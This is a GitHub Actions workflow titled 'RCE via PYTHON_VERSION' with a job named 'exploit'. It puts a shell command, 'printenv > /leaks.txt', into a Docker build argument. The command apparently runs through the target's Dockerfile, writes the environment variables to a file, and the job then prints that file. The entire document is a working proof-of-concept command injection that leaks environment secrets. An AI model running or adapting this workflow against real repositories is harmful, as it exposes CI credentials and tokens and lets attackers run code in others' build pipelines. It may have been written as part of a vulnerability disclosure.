name: RCE via PYTHON_VERSION
on: push
jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Inject and Leak
        run: |
          docker build \
            --build-arg PYTHON_VERSION="printenv > /leaks.txt" \
            -t leak ./taskcluster/docker/python
          docker run --rm leak cat /leaks.txt
